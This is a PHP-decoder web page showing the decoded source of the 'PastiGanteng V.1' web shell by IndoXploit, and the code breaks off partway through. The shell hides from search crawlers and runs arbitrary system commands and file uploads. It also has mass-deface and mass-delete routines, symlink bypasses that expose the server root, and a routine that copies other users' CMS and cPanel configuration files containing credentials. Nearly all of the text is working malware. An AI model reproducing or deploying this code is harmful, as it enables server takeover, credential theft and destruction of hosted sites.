Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php // Xmall75 - Security Cyber Art // PastiGanteng V.1 Shell // Remake and Recode ..
Decoded Output download
session_start();
error_reporting(0);
set_time_limit(0);
@set_magic_quotes_runtime(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$color = "#00ff00";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'UTF-8';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
function login_shell() {
?>
<html>
<head>
<title>Gue Ganteng ~TQ</title>
<style type="text/css">
html {
margin: 20px auto;
background: #000000;
text-align: center;
}
header {
margin: 10px auto;
color: lightblue;
font-family: Arial;
}
input[type=password] {
width: 250px;
height: 25px;
color: red;
background: #000000;
border: 1px solid #333;
padding: 5px;
text-align: center;
transition: box-shadow 0.4s ease-out, border 0.4s ease-out;
-webkit-transition: box-shadow 0.4s ease-out, border 0.4s ease-out;
-moz-transition: box-shadow 0.4s ease-out, border 0.4s ease-out;
-ms-transition: box-shadow 0.4s ease-out, border 0.4s ease-out;
}
input[type=password]:focus {
box-shadow: 0px 0px 5px #cc0000, 0px 0px 15px #ff0000, 0px 0px 25px #ff0000, 0px 0px 35px #cc0000;
border: 1px solid #ff0000;
}
</style>
</head>
<center>
<header>
<h2>
PastiGanteng V.1 Shell
<br>
<br>
<img src="https://scontent-sin6-2.xx.fbcdn.net/v/t1.0-9/17796664_1922183891333995_395507225586159207_n.jpg?oh=01d79c23a1198caab095d950928816fb&oe=59F3F806" width="300px" height="300px">
</h2>
</header>
<form method="post">
<input type="password" name="pass">
</form>
<?php
exit;
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
login_shell();
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
@ob_clean();
$file = $_GET['file'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
?>
<html>
<head>
<title>PastiGanteng V.1 Shell</title>
<meta name='author' content='IndoXploit'>
<meta charset="UTF-8">
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
html {
background: #000000;
color: gold;
font-family: 'Ubuntu';
font-size: 13px;
width: 100%;
}
li {
display: inline;
margin: 5px;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'Ubuntu';
font-size: 13px;
}
.table_home, .th_home, .td_home {
border: 1px solid #333;
}
.th_home {
background: #333;
color: lightblue;
}
th {
padding: 10px;
}
ul a {
color: lightblue;
text-decoration: none;
background: #333;
margin: 5px auto;
padding: 5px;
transition: background 0.4s ease;
border-radius: 4px;
}
ul a:hover {
opacity : 0.4;
text-decoration: none;
background: #999;
}
a {
color: #ff0000;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
input[type=text], input[type=password],input[type=submit],input[type=file] {
background: transparent;
color: #fff;
border: 1px solid #333;
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
textarea {
border: 1px solid #333;
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
}
select {
width: 152px;
background: #000000;
color: lime;
border: 1px solid #333;
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
option:hover {
background: #ff0000;
color: #fff;
}
</style>
</head>
<?php
###############################################################################
// Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
// Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
// Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
// Tanpa kalian kita tidak akan BESAR seperti sekarang.
// Greetz: All Member IndoXploit. & all my friends.
###############################################################################
function w($dir,$perm) {
if(!is_writable($dir)) {
return "<font color=red>".$perm."</font>";
} else {
return "<font color=lime>".$perm."</font>";
}
}
function r($dir,$perm) {
if(!is_readable($dir)) {
return "<font color=red>".$perm."</font>";
} else {
return "<font color=lime>".$perm."</font>";
}
}
function exe($cmd) {
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function hdd($s) {
if($s >= 1073741824)
return sprintf('%1.2f',$s / 1073741824 ).' GB';
elseif($s >= 1048576)
return sprintf('%1.2f',$s / 1048576 ) .' MB';
elseif($s >= 1024)
return sprintf('%1.2f',$s / 1024 ) .' KB';
else
return $s .' B';
}
function ambilKata($param, $kata1, $kata2){
if(strpos($param, $kata1) === FALSE) return FALSE;
if(strpos($param, $kata2) === FALSE) return FALSE;
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return $return;
}
function getsource($url) {
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
$content = curl_exec($curl);
curl_close($curl);
return $content;
}
function bing($dork) {
$npage = 1;
$npages = 30000;
$allLinks = array();
$lll = array();
while($npage <= $npages) {
$x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
if($x) {
preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
$npage = $npage + 10;
if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break;
} else break;
}
$URLs = array();
foreach($allLinks as $url){
$exp = explode("/", $url);
$URLs[] = $exp[2];
}
$array = array_filter($URLs);
$array = array_unique($array);
$sss = count(array_unique($array));
foreach($array as $domain) {
echo $domain."
";
}
}
function reverse($url) {
$ch = curl_init("http://domains.yougetsignal.com/domains.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POST, 1);
$resp = curl_exec($ch);
$resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
$array = explode(",,", $resp);
unset($array[0]);
foreach($array as $lnk) {
$lnk = "http://$lnk";
$lnk = str_replace(",", "", $lnk);
echo $lnk."
";
ob_flush();
flush();
}
curl_close($ch);
}
if(get_magic_quotes_gpc()) {
function idx_ss($array) {
return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
}
$_POST = idx_ss($_POST);
$_COOKIE = idx_ss($_COOKIE);
}
if(isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$kernel = php_uname();
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$dir = str_replace("\","/",$dir);
$scdir = explode("/", $dir);
$freespace = hdd(disk_free_space("/"));
$total = hdd(disk_total_space("/"));
$used = $total - $freespace;
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
echo "<center><span style='color: #eee; font-size: 30px; font-weight: bold;'>PastiGanteng Shell</span></center>";
echo "<hr color='#333'>";
echo "<center>";
echo "System: <font color=red>".$kernel."</font><br>";
echo "User: <font color=red>".$user."</font> (".$uid.") Group: <font color=red>".$group."</font> (".$gid.")<br>";
echo "Server IP: <font color=red>".$ip."</font> | Your IP: <font color=red>".$_SERVER['REMOTE_ADDR']."</font><br>";
echo "HDD: <font color=red>$used</font> / <font color=red>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
echo "Safe Mode: $sm<br>";
echo "Disable Functions: $show_ds<br>";
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
echo "</center>";
echo "<br>";
echo "<form method='post'>
<font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
<input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
</form>";
if($_POST['do_cmd']) {
echo "<pre>".exe($_POST['cmd'])."</pre>";
}
echo "<form method='post' enctype='multipart/form-data'>
<input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
<input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
<input type='file' name='ix_file'>
<input type='submit' value='upload' name='upload'>
</form>";
if($_POST['upload']) {
if($_POST['tipe_upload'] == 'biasa') {
if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
$act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
} else {
$act = "<font color=red>failed to upload file</font>";
}
} else {
$root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
$web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
$act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
} else {
$act = "<font color=red>failed to upload file</font>";
}
} else {
$act = "<font color=red>failed to upload file</font>";
}
}
}
echo "<hr>";
echo "<center>";
echo "Current DIR: ";
foreach($scdir as $c_dir => $cdir) {
echo "<a href='?dir=";
for($i = 0; $i <= $c_dir; $i++) {
echo $scdir[$i];
if($i != $c_dir) {
echo "/";
}
}
echo "'>$cdir</a>/";
}
echo " [ ".w($dir, perms($dir))." ]";
echo "<br>";
echo "<br>";
echo "<ul>";
echo "<li><a href='?dir=$dir&do=mass_deface'>Mass Deface</a></li>";
echo "<li><a href='?dir=$dir&do=mass_delete'>Mass Delete</a></li>";
echo "<li><a href='?dir=$dir&do=symlink'>Symlink</a></li>";
echo "<li><a href='?dir=$dir&do=config'>Config</a></li>";
echo "<li><a href='?dir=$dir&do=vhost'>vHost Config</a></li>";
echo "<li><a href='?dir=$dir&do=jumping'>Jumping</a></li>";
echo "<li><a href='?dir=$dir&do=cpanel'>CPanel Crack</a></li>";
echo "<li><a href='?dir=$dir&do=domain'>Domains Viewer</a></li>";
echo "<li><a href='?dir=$dir&do=server'>Server Info</a></li>";
echo "<li><a style='color: red; font-weight: bold;' href='?'>Home</a></li>";
echo "<br>";
echo "<br>";
echo "<li><a href='?dir=$dir&do=smtp'>SMTP Grabber</a></li>";
echo "<li><a href='?dir=$dir&do=zoneh'>Zone-H</a></li>";
echo "<li><a href='?dir=$dir&do=defid'>DefacerID</a></li>";
echo "<li><a href='?dir=$dir&do=reverseip'>Reverse IP</a></li>";
echo "<li><a href='?dir=$dir&do=cgi'>CGI Telnet</a></li>";
echo "<li><a href='?dir=$dir&do=network'>network</a></li>";
echo "<li><a href='?dir=$dir&do=adminer'>Adminer</a></li>";
echo "<li><a href='?dir=$dir&do=fake_root'>Fake Root</a></li>";
echo "<li><a href='?dir=$dir&do=hasher'>Password Hasher</a></li>";
echo "<li><a href='?dir=$dir&do=contact'>Contact</a></li>";
echo "<li><a style='color: red; font-weight: bold;' href='?dir=$dir&do=kill'>Kill</a></li>";
echo "<br>";
echo "<br>";
echo "<li><a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a></li>";
echo "<li><a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a></li>";
echo "<li><a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a></li>";
echo "<li><a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a></li>";
echo "<li><a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a></li>";
echo "<li><a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a></li>";
echo "<li><a style='color: red; font-weight: bold;' href='?logout=true'>Logout</a></li>";
echo "</ul>";
echo "</center>";
echo "<hr>";
if($_GET['logout'] == true) {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo "<script>window.location='?';</script>";
} elseif($_GET['do'] == 'kill') {
if(@unlink(preg_replace('!(d+)s.*!', '', __FILE__)))
die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
else
echo '<center>unlink failed!</center>';
} elseif($_GET['do'] == 'mass_deface') {
function sabun_massal($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=lime>DONE</font>] $lokasi<br>";
file_put_contents($lokasi, $isi_script);
$idx = sabun_massal($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function sabun_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
file_put_contents($lokasi, $isi_script);
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe_sabun'] == 'mahal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif($_POST['tipe_sabun'] == 'murah') {
echo "<div style='margin: 5px auto; padding: 5px'>";
sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<center>";
echo "<form method='post'>
<font style='text-decoration: underline;'>Tipe Sabun:</font><br>
<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
<font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Index File:</font><br>
<textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
</form></center>";
}
} elseif($_GET['do'] == 'mass_delete') {
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($lokasi)) {
echo "[<font color=lime>DELETED</font>] $lokasi<br>";
unlink($lokasi);
$idx = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<center>";
echo "<form method='post'>
<font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
<input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
</form></center>";
}
} elseif($_GET['do'] == 'symlink') {
echo "<center><br><a style='border: 1px solid #333; background: #333; margin: 10px; padding: 10px; border-radius: 3px;' href='?dir=$dir&do=symlink2'> Symlink Server 2 </a><br><br><br><a style='border: 1px solid #333; background: #333; margin: 10px; padding: 10px; border-radius: 3px;' href='?dir=$dir&do=sym404'> Bypass Symlink 404 </a></center>";
} elseif($_GET['do'] == 'sym404') {
echo "<form method='post'><br>File Target : <br><input type='text' name='dir' value='/home/user/public_html/wp-config.php'>
<br>Save As: <br><input type='text' name='jnck' value='ojayakan.txt'><input name='ojaykan' type='submit' value='>>'></form><br>";
@ini_set('display_errors', 0);
if($_POST['ojaykan']){
rmdir("pastigans_sym404");mkdir("pastigans_sym404", 0777);
$dir = $_POST['dir'];
$jnck = $_POST['jnck'];
system("ln -s ".$dir." pastigans_sym404/".$jnck);
symlink($dir,"pastigans_sym404/".$jnck);
$inija = fopen("pastigans_sym404/.htaccess", "w");
fwrite($inija,"ReadmeName ".$jnck."
Options Indexes FollowSymLinks
DirectoryIndex ngeue.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any
");
echo'<a href="pastigans_sym404/">Klik Gan >:(</a>';
}
} elseif($_GET['do'] == 'symlink2') {
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
$d0mains = @file("/etc/named.conf");
##httaces
if($d0mains){
@mkdir("pastigans_sym",0777);
@chdir("pastigans_sym");
@exe("ln -s / root");
$file3 = 'Options Indexes FollowSymLinks
DirectoryIndex pastigans.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any';
$fp3 = fopen('.htaccess','w');
$fw3 = fwrite($fp3,$file3);@fclose($fp3);
echo "
<table align=center border=1 style='width:60%;border-color:#333333;'>
<tr>
<td align=center><font size=2>S. No.</font></td>
<td align=center><font size=2>Domains</font></td>
<td align=center><font size=2>Users</font></td>
<td align=center><font size=2>Symlink</font></td>
</tr>";
$dcount = 1;
foreach($d0mains as $d0main){
if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
<td>".$user['name']."</td>
<td><a href='$full/pastigans_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
flush();
$dcount++;}}}
echo "</table>";
}else{
$TEST=@file('/etc/passwd');
if ($TEST){
@mkdir("pastigans_sym",0777);
@chdir("pastigans_sym");
exe("ln -s / root");
$file3 = 'Options Indexes FollowSymLinks
DirectoryIndex pastigans.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any';
$fp3 = fopen('.htaccess','w');
$fw3 = fwrite($fp3,$file3);
@fclose($fp3);
echo "
<table align=center border=1><tr>
<td align=center><font size=3>S. No.</font></td>
<td align=center><font size=3>Users</font></td>
<td align=center><font size=3>Symlink</font></td></tr>";
$dcount = 1;
$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
while(!feof($file)){
$s = fgets($file);
$matches = array();
$t = preg_match('//(.*?)://s', $s, $matches);
$matches = str_replace("home/","",$matches[1]);
if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
continue;
echo "<tr><td align=center><font size=2>" . $dcount . "</td>
<td align=center><font class=txt>" . $matches . "</td>";
echo "<td align=center><font class=txt><a href=$full/pastigans_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
$dcount++;}fclose($file);
echo "</table>";}else{if($os != "Windows"){@mkdir("pastigans_sym",0777);@chdir("pastigans_sym");@exe("ln -s / root");$file3 = '
Options Indexes FollowSymLinks
DirectoryIndex pastigans.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any
';
$fp3 = fopen('.htaccess','w');
$fw3 = fwrite($fp3,$file3);@fclose($fp3);
echo "
<div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
<table align=center border=1><tr>
<td align=center><font size=3>ID</font></td>
<td align=center><font size=3>Users</font></td>
<td align=center><font size=3>Symlink</font></td></tr>";
$temp = "";$val1 = 0;$val2 = 1000;
for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
if ($uid)$temp .= join(':',$uid)."n";}
echo '<br/>';$temp = trim($temp);$file5 =
fopen("test.txt","w");
fputs($file5,$temp);
fclose($file5);$dcount = 1;$file =
fopen("test.txt", "r") or exit("Unable to open file!");
while(!feof($file)){$s = fgets($file);$matches = array();
$t = preg_match('//(.*?)://s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
continue;
echo "<tr><td align=center><font size=2>" . $dcount . "</td>
<td align=center><font class=txt>" . $matches . "</td>";
echo "<td align=center><font class=txt><a href=$full/pastigans_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
$dcount++;}
fclose($file);
echo "</table></div></center>";unlink("test.txt");
} else
echo "<center><font size=3>Cannot create Symlink</font></center>";
}
}
} elseif($_GET['do'] == 'vhost') {
echo "<form method='POST' action=''>";
echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
if (isset($_POST['Colii'])){ system('ln -s / pastigans.txt');
$fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
$file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","pastigans.txt");
$rt="<br><a href=pastigans.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
Bypassed Successfully</b></font></a>";
echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt</center>";} echo "</form>";
} elseif($_GET['do'] == 'config') {
$etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
$idx = mkdir("pastigans_config", 0777);
$isi_htc = "Options allnRequire NonenSatisfy Any";
$htc = fopen("pastigans_config/.htaccess","w");
fwrite($htc, $isi_htc);
while($passwd = fgets($etc)) {
if($passwd == "" || !$etc) {
echo "<font color=red>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_config);
foreach($user_config[1] as $user_pastigans) {
$user_config_dir = "/home/$user_pastigans/public_html/";
if(is_readable($user_config_dir)) {
$grab_config = array(
"/home/$user_pastigans/.my.cnf" => "cpanel",
"/home/$user_pastigans/.accesshash" => "WHM-accesshash",
"/home/$user_pastigans/public_html/vdo_config.php" => "Voodoo",
"/home/$user_pastigans/public_html/bw-configs/config.ini" => "BosWeb",
"/home/$user_pastigans/public_html/config/koneksi.php" => "Lokomedia",
"/home/$user_pastigans/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
"/home/$user_pastigans/public_html/clientarea/configuration.php" => "WHMCS",
"/home/$user_pastigans/public_html/whm/configuration.php" => "WHMCS",
"/home/$user_pastigans/public_html/whmcs/configuration.php" => "WHMCS",
"/home/$user_pastigans/public_html/forum/config.php" => "phpBB",
"/home/$user_pastigans/public_html/sites/default/settings.php" => "Drupal",
"/home/$user_pastigans/public_html/config/settings.inc.php" => "PrestaShop",
"/home/$user_pastigans/public_html/app/etc/local.xml" => "Magento",
"/home/$user_pastigans/public_html/joomla/configuration.php" => "Joomla",
"/home/$user_pastigans/public_html/configuration.php" => "Joomla",
"/home/$user_pastigans/public_html/wp/wp-config.php" => "WordPress",
"/home/$user_pastigans/public_html/wordpress/wp-config.php" => "WordPress",
"/home/$user_pastigans/public_html/wp-config.php" => "WordPress",
"/home/$user_pastigans/public_html/admin/config.php" => "OpenCart",
"/home/$user_pastigans/public_html/slconfig.php" => "Sitelok",
"/home/$user_pastigans/public_html/application/config/database.php" => "Ellislab");
foreach($grab_config as $config => $nama_config) {
$ambil_config = file_get_contents($config);
if($ambil_config == '') {
} else {
$file_config = fopen("pastigans_config/$user_pastigans-$nama_config.txt","w");
fputs($file_config,$ambil_config);
}
}
}
}
}
}
echo "<center><a href='?dir=$dir/pastigans_config'><font color=blue>Done</font></a></center>";
} elseif($_GET['do'] == 'config') {
$idx = mkdir("pastigans_config", 0777);
$isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI
Require None
Satisfy Any
AddType application/x-httpd-cgi .cin
AddHandler cgi-script .cin
AddHandler cgi-script .cin";
$htc = fopen("pastigans_config/.htaccess","w");
fwrite($htc, $isi_htc);
fclose($htc);
if(preg_match("/vhosts|vhost/", $dir)) {
$link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
